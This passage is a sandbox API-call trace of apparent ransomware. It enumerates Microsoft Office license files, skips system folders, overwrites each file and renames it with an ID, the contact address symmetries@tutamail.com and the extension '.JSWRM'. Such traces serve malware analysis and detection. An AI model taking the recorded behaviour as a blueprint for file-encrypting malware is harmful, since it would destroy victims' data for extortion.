dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0104.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0104.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0104.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0104.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0104.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.935] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0104.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0104.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0104.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.936] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe61b0488, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe61b0488, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6353e21, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial2-pl.xrm-ms", cAlternateFileName="O325AC~1.XRM")) returned 1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2=".") returned 1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2="..") returned 1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2="...") returned 1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2="windows") returned -1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2="recovery") returned -1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.936] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-pl.xrm-ms", lpString2="msocache") returned 1 [0104.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0104.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0104.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0104.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0104.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0104.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.937] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0104.937] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.937] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.952] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.952] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.952] CloseHandle (hObject=0x45c) returned 1 [0104.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0104.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0104.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0104.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0104.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0104.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0104.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.952] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0104.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0104.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.954] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6117ab6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6117ab6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe61fc917, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial2-ppd.xrm-ms", cAlternateFileName="O3A06B~1.XRM")) returned 1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2=".") returned 1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2="..") returned 1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2="...") returned 1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2="windows") returned -1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.954] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0104.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0104.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d298, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0104.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0104.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0104.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0104.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0104.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0104.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0104.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.955] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23135) returned 1 [0104.955] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0104.955] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0104.999] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.999] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0104.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.999] CloseHandle (hObject=0x45c) returned 1 [0104.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0104.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0104.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0104.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0105.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0105.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.000] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0105.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0105.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0105.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.001] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6353e21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6353e21, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6412a1d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d73, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial2-ul-oob.xrm-ms", cAlternateFileName="O386C3~1.XRM")) returned 1 [0105.001] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.001] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.001] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.001] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.001] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.001] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.002] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.002] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.002] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.002] lstrcmpiW (lpString1="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0105.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0105.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0105.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial2-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0105.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0105.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0105.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0105.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.003] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11635) returned 1 [0105.003] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 